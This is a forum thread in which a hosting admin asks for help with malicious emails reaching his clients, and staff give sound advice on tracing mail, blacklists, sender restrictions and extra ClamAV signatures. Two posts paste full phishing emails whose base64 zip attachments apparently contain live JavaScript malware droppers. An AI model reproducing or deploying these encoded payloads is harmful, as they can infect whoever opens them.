Spam, phishing and virusses are being sent from my server.

Discussion in 'General' started by larsvansante, Mar 27, 2016.

  1. larsvansante

    larsvansante New Member

    Hello,

    All of my clients are getting malicious emails sent from my server. I have never dealt with anything like this, I already contacted them adn explained the situation. One of them is infected and can't use his computer anymore. It is about a debian 7 perfect ispconfig server with apache from the tutorials.

    What are the apropriate steps? I already have a new server spinned up to move everything, but I don't want it getting infected as well.
    I am literally panicking...
    Thanks.
     
  2. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    First thing you'll want to identify where the emails are coming from, for which you look at the (full) headers in the email messages and your mail log file. You say they are "from your server," what exactly do you mean by that?

    If they are sent through an email account on your server you may just need to change passwords on the account.

    If they originate from your server but are unauthenticated, it's quite possible they come through a website. Check your web server logs to try to identify such requests; eg. see if the originating ip addr is in the email headers and search for it, or simply search for the time range the messages were sent. Once you can identify the website(s) affected, you can then find the specific script(s) which are being exploited, and start looking into what's needed to fix it, which might be as simple as updating software (eg. wordpress core/plugins/themes). There are tools to help your search here, eg. maldet and ispprotect are 2 that come to mind. If you find strange scripts which shouldn't be there sending email, probably the entire website is compromised and you should approach it as such (change passwords, clean up the site, update software, etc.).

    If you simply meant your server is the mail server through which your client received an infected mail (ie. unauthenticated mail originating from the internet), you can try to improve your mail filtering/virus scanning. There's quite a bit which can be done (and it's a complex topic), though in the end it's an arms race against those sending that stuff, so is never perfect (in some environments user education can certainly help). Some things to try: look at adding move virus scanning signatures, and/or additional scanners; update to current software if your server is old; block obviously malicious file types/attachments, and even less obvious ones if your environment allows it; utilize blacklists/whitelists in both your mail system and firewalls; look at rescanning already delivered mail at later dates so new malware which slips through gets caught later on (if the mail isn't already downloaded....).

    See what you find with that and post back as you walk through it, there are quite a few helpful folks here.
     
  3. larsvansante

    larsvansante New Member

    Hello, Thank you for your help :)

    I suspect they were coming from sites, with ispprotect I was able to find some malicious code on different websites which I deleted. (I didn't use those sites anymore as they were from old clients)

    I checked with maldet and it didn't find anything.
    Once I am certain the rest is clean, I will move every site to a new server. (I had some trouble upgrading this one to jessie in the past)

    Below is the source of one of the emails I had. It displays like it came from my mailbox.
    Maybe you see more than I do...

    Code:
    Return-Path: <[email protected]>
    X-Original-To: [email protected]
    Delivered-To: [email protected]
    Received: from localhost (localhost [127.0.0.1])
        by server1.lswebs.net (Postfix) with ESMTP id 2E08E40A4AB
        for <[email protected]>; Thu, 24 Mar 2016 15:26:55 +0100 (CET)
    X-Virus-Scanned: Debian amavisd-new at server1.lswebs.nl
    X-Amavis-Alert: BAD HEADER SECTION, MIME error: error: part did not end with
        expected boundary
    Received: from server1.lswebs.net ([127.0.0.1])
        by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024)
        with ESMTP id aRWfQTluM8ct for <[email protected]>;
        Thu, 24 Mar 2016 15:26:54 +0100 (CET)
    Received: from 82.186-71-150.uio.satnet.net (unknown [186.71.150.82])
        by server1.lswebs.net (Postfix) with ESMTP id CBD4A40A4A3
        for <[email protected]>; Thu, 24 Mar 2016 15:26:53 +0100 (CET)
    From: <[email protected]>
    To: <[email protected]>
    Subject: Document2
    Thread-Topic: Document2
    Thread-Index: AdF+sJZYKtxaTvOhSFC+rMKD/CUwyg==
    Date: Thu, 24 Mar 2016 09:26:53 -0500
    Message-ID: <[email protected]>
    Accept-Language: en-GB, en-US
    Content-Language: en-US
    X-MS-Has-Attach: yes
    X-MS-TNEF-Correlator:
    x-originating-ip: [192.168.0.28]
    Content-Type: multipart/mixed;
        boundary="_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_"
    MIME-Version: 1.0
    
    --_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
    Content-Type: multipart/alternative;
        boundary="_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_"
    
    --_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
    Content-Type: text/plain; charset="us-ascii"
    Content-Transfer-Encoding: quoted-printable
    
    
    
    --_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
    Content-Type: text/html; charset="us-ascii"
    Content-Transfer-Encoding: quoted-printable
    
    <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" xmlns:w=3D"urn:sc=
    hemas-microsoft-com:office:word" xmlns:m=3D"http://schemas.microsoft.com/of=
    fice/2004/12/omml" xmlns=3D"http://www.w3.org/TR/REC-html40">
    <head>
    <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dus-ascii"=
    >
    <meta name=3D"Generator" content=3D"Microsoft Word 14 (filtered medium)">
    <style><!--
    /* Font Definitions */
    @font-face
        {font-family:Calibri;
        panose-1:2 15 5 2 2 2 4 3 2 4;}
    /* Style Definitions */
    p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0cm;
        margin-bottom:.0001pt;
        font-size:11.0pt;
        font-family:"Calibri","sans-serif";
        mso-fareast-language:EN-US;}
    a:link, span.MsoHyperlink
        {mso-style-priority:99;
        color:blue;
        text-decoration:underline;}
    a:visited, span.MsoHyperlinkFollowed
        {mso-style-priority:99;
        color:purple;
        text-decoration:underline;}
    span.EmailStyle17
        {mso-style-type:personal-compose;
        font-family:"Calibri","sans-serif";
        color:windowtext;}
    .MsoChpDefault
        {mso-style-type:export-only;
        font-family:"Calibri","sans-serif";
        mso-fareast-language:EN-US;}
    @page WordSection1
        {size:612.0pt 792.0pt;
        margin:72.0pt 72.0pt 72.0pt 72.0pt;}
    div.WordSection1
        {page:WordSection1;}
    --></style>
    </head>
    <body lang=3D"EN-GB" link=3D"blue" vlink=3D"purple">
    <div class=3D"WordSection1">
    <p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
    </div>
    </body>
    </html>
    
    --_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_--
    
    --_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
    Content-Type: application/zip;
        name="Document2.zip"
    Content-Description: Document2.zip
    Content-Disposition: attachment; filename="Document2.zip";
    Content-Transfer-Encoding: base64
    
    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
    Tg8AAAAA
    
    --_009_02A7D35DF447A24E8CA110F51FF16CDD57055CDAUZNA89buhlerltd_--
     
  4. larsvansante

    larsvansante New Member

    This is another source of email I got, it uses a non existing mailbox.

    Code:
    Return-Path: <[email protected]>
    X-Original-To: [email protected]
    Delivered-To: [email protected]
    Received: from localhost (localhost [127.0.0.1])
        by server1.lswebs.net (Postfix) with ESMTP id B46784027BA
        for <[email protected]>; Mon, 28 Mar 2016 16:19:00 +0200 (CEST)
    X-Virus-Scanned: Debian amavisd-new at server1.lswebs.nl
    Received: from server1.lswebs.net ([127.0.0.1])
        by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024)
        with ESMTP id 08uZa3twZWQ9 for <[email protected]>;
        Mon, 28 Mar 2016 16:18:59 +0200 (CEST)
    Received: from [180.149.210.18] (unknown [180.149.210.18])
        by server1.lswebs.net (Postfix) with ESMTP id 623A8402793
        for <[email protected]>; Mon, 28 Mar 2016 16:18:59 +0200 (CEST)
    From: "netadmin" <[email protected]>
    To: "[email protected]" <[email protected]>
    Subject: Document (1).pdf
    Date: Mon, 28 Mar 2016 19:18:58 +0500
    Message-ID: <[email protected]>
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0042_01D0A1F9.171F24B0"
    X-Mailer: Microsoft Outlook 14.0
    Thread-Index: AdCh6FNHn/LWax1JSTSc7XL2c2t2TQ==
    Content-Language: en-US
    
    This is a multipart message in MIME format.
    
    ------=_NextPart_000_0042_01D0A1F9.171F24B0
    Content-Type: text/plain;
        charset="us-ascii"
    Content-Transfer-Encoding: 7bit
    
    Document (1).pdf
    
    ------=_NextPart_000_0042_01D0A1F9.171F24B0
    Content-Type: application/zip;
        name="Document (1).zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment;
        filename="Document (1).zip"
    
    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
    
    ------=_NextPart_000_0042_01D0A1F9.171F24B0--
     
  5. larsvansante

    larsvansante New Member

    I checked the last mail in the log and this is what it says:

    Code:
    Mar 28 16:18:59 server1 postfix/smtpd[19539]: connect from unknown[180.149.210.18]
    Mar 28 16:18:59 server1 postfix/smtpd[19539]: 623A8402793: client=unknown[180.149.210.18]
    Mar 28 16:18:59 server1 postfix/cleanup[20138]: 623A8402793: message-id=<[email protected]>
    Mar 28 16:18:59 server1 postfix/qmgr[5096]: 623A8402793: from=<[email protected]>, size=5204, nrcpt=1 (queue active)
    Mar 28 16:18:59 server1 postfix/smtpd[19539]: disconnect from unknown[180.149.210.18]
    
     
  6. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    Those both appear to be unauthenticated mail coming from the internet, not compromised websites that you host.

    Do you use sanesecurity rules? (http://sanesecurity.com/) Clamav rules out of the box are quite inadequate. There are several other virus scanners for linux as well which you could look at using in combination.

    Some places can get away with blocking .zip files entirely, which would stop these in particular. Most places can't, but you can probably block .exe and friends if you don't already.

    These 2 sending ip addrs are one quite a few blacklists at this point. They may not have been when the messages were sent, but make sure you're utilizing some rbls:

    http://www.anti-abuse.org/multi-rbl-check-results/?host=186.71.150.82
    http://www.anti-abuse.org/multi-rbl-check-results/?host=180.149.210.18

    This catches quite a few that slip by at first, and is worth looking at.


    One other suggestion is to limit who can send mail claiming to be from your domain. Look at a hard fail SPF policy for larsvansante.nl, and get familiar with the options you have in postfix sender restrictions (http://www.postfix.org/postconf.5.html#smtpd_sender_restrictions) - add reject_sender_login_mismatch and reject_unlisted_sender to help with the two samples above, but it does have implications for everyone using your server (test it with warn_if_reject first if needed).
     
  7. larsvansante

    larsvansante New Member

    Thank you so much! I added the sender restrictions you defined which did not help, I Didn't find any good tutorial for the sane check yet, but the blacklists definatly work! :) No spam since then.
    Could you tell me if this hardening guide still applies to debian jessie?
    https://www.howtoforge.com/hardening-postfix-for-ispconfig-3

    I will go through all of it on my new server.
     
  8. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    What is your smtpd_sender_restrictions set to?

    For debian the easiest way is install the clamav-unofficial-sigs package:
    Code:
    apt-get install clamav-unofficial-sigs -y
    That will download a default set of sanesecurity signatures, as well as some from other sources. There are more sanesecurity signatures to consider though, see http://sanesecurity.com/usage/signatures/ for available signature databases and their FP likelihood.

    A quick look at the debian readme shows how to override settings for clamav-unofficial-sigs:
    Code:
    zless /usr/share/doc/clamav-unofficial-sigs/README.Debian.gz
    As an example, to add the badmacro signatures copy the ss_dbs= section from /usr/share/clamav-unofficial-sigs/conf.d/00-clamav-unofficial-sigs.conf to a custom conf file:
    Code:
    sed -n '/^ss_dbs=/,$p' /usr/share/clamav-unofficial-sigs/conf.d/00-clamav-unofficial-sigs.conf | sed '/^$/,$d' > /etc/clamav-unofficial-sigs.conf.d/sanesecurity.conf
    Then add badmacro.ndb to that list with your text editor or:
    Code:
    echo 'ss_dbs="${ss_dbs} badmacro.ndb"' >>/etc/clamav-unofficial-sigs.conf.d/sanesecurity.conf
    Then wait for the next hourly cronjob, or run clamav-unofficial-sigs manually to download that:
    Code:
    sudo -u clamav /usr/sbin/clamav-unofficial-sigs
